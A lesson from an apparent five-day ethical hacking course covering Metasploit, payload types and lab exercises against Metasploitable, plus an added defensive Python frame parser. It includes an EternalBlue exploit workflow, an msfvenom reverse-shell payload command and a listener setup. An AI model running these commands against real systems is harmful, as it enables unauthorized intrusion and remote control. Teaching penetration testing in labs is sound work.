Day 3 of 5
⏱ ~60 minutes
Ethical Hacking in 5 Days — Day 3

Exploitation Fundamentals

Enumeration found the gaps — now you exploit them. Today covers the Metasploit Framework, manual exploitation techniques, and the ethical rules that separate penetration testers from criminals.

The Metasploit Framework

Metasploit is the world's most used penetration testing framework. It organizes exploits, payloads, and auxiliary modules into a consistent interface. msfconsole is the primary CLI. Workflows: search for a module, use it, set options (RHOSTS, LPORT), run. Metasploit handles shellcode generation, encoding, and handler setup automatically.

Manual Exploitation with Python

Framework tools don't cover everything. Custom exploits require understanding buffer overflows, format string vulnerabilities, and injection flaws. Python's socket and struct libraries let you craft raw packets. Understanding the underlying technique makes you far more effective than running canned modules blindly.
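As an added example that is not part of the course material, the snippet below shows the socket and struct plumbing from the receiving side: a service that reads a length-prefixed frame, rejects an oversized declared length before allocating for it, and flags the long runs of one repeated byte that overflow probes typically carry. The 6-byte wire format (version, length) is constructed for this example and is not a real protocol; the run-length threshold is an assumption.

```python
import socket
import struct

# Constructed wire format for this example (not a real protocol):
#   uint16 little-endian  version
#   uint32 little-endian  payload length
# followed by the payload itself.
HEADER = struct.Struct("<HI")
MAX_PAYLOAD = 1024          # hard cap; larger declared lengths are rejected unread
PAD_RUN_THRESHOLD = 64      # assumed threshold: a run this long is treated as filler


class FrameError(ValueError):
    """Raised when a frame violates the format or the size cap."""


def build_frame(version: int, payload: bytes) -> bytes:
    """Pack header + payload the way a client crafting a raw packet would."""
    return HEADER.pack(version, len(payload)) + payload


def recv_exact(sock: socket.socket, n: int) -> bytes:
    """Read exactly n bytes; TCP recv() may return fewer, so keep looping."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise FrameError("peer closed mid-frame")
        buf += chunk
    return bytes(buf)


def recv_frame(sock: socket.socket) -> tuple[int, bytes]:
    """Hardened reader: validate the declared length *before* reading that much."""
    version, length = HEADER.unpack(recv_exact(sock, HEADER.size))
    if length > MAX_PAYLOAD:
        raise FrameError(f"declared length {length} exceeds cap {MAX_PAYLOAD}")
    return version, recv_exact(sock, length)


def longest_run(data: bytes) -> tuple[int, int]:
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best_byte, best_len = -1, 0
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best_len:
            best_byte, best_len = data[i], j - i
        i = j
    return best_byte, best_len


def looks_like_overflow_probe(payload: bytes) -> bool:
    """Heuristic: a long run of a single byte is typical filler in overflow attempts."""
    return longest_run(payload)[1] >= PAD_RUN_THRESHOLD


def roundtrip(frame: bytes) -> tuple[int, bytes]:
    """Push a raw frame through a connected socket pair and parse it on the far end."""
    client, server = socket.socketpair()
    try:
        client.sendall(frame)
        client.shutdown(socket.SHUT_WR)   # EOF so a short frame fails instead of hanging
        return recv_frame(server)
    finally:
        client.close()
        server.close()


if __name__ == "__main__":
    print(roundtrip(build_frame(1, b"hello")))                 # (1, b'hello')
    print(looks_like_overflow_probe(b"A" * 300))               # True: 300-byte run
    try:
        roundtrip(HEADER.pack(1, 2**31) + b"x")                # huge declared length
    except FrameError as err:
        print("rejected:", err)
```

The cap check runs on the unpacked header before any allocation, which is the control a native-code reader would be missing when a declared length is trusted blindly; the run-length heuristic is a cheap first-pass signal for an IDS rule, not proof of exploitation on its own.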

Payload Types: Staged vs. Stageless

A stageless payload (windows/x64/shell_reverse_tcp) embeds the entire shell. A staged payload (windows/x64/shell/reverse_tcp) sends a tiny stager first, which downloads the full payload. Stageless is simpler and more reliable through strict firewalls. Staged payloads are smaller and evade some AV signatures.

```bash
# Metasploit workflow (msfconsole prompt shown as "msf6 >")
msfconsole
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > show options
msf6 > set RHOSTS 192.168.1.100
msf6 > set LHOST 192.168.1.50
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > run

# Generate a standalone payload with msfvenom (run from a normal shell, not inside msfconsole)
msfvenom -p linux/x64/shell_reverse_tcp \
  LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

# Set up the listener; LHOST/LPORT must match the values baked into the payload
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD linux/x64/shell_reverse_tcp
msf6 > set LHOST 192.168.1.50
msf6 > set LPORT 4444
msf6 > run
```
💡 Screenshot everything. Exploitation proof (a screenshot showing command output with IP, hostname, and whoami/id) is mandatory in professional pen-test reports.
📝 Day 3 Exercise
Exploit Metasploitable Services
  1. Launch msfconsole and search for the vsftpd 2.3.4 backdoor exploit
  2. Configure the exploit with RHOSTS set to your Metasploitable IP
  3. Run the exploit and confirm shell access with the 'id' command
  4. Find and exploit the UnrealIRCd backdoor using a second Metasploit module
  5. Document both exploits with screenshots for a mock report entry

Day 3 Summary

  • Metasploit organizes exploits, payloads, and listeners in one framework
  • msfvenom generates custom payloads for specific platforms
  • Staged payloads download the shell in two steps; stageless embeds everything
  • Screenshot exploitation proof — it is required in professional reports
  • Never run exploits outside your authorized scope

Challenge

Exploit the Metasploitable distcc daemon vulnerability manually using Netcat and a Python script (no Metasploit). Document the CVE number and the exact steps.
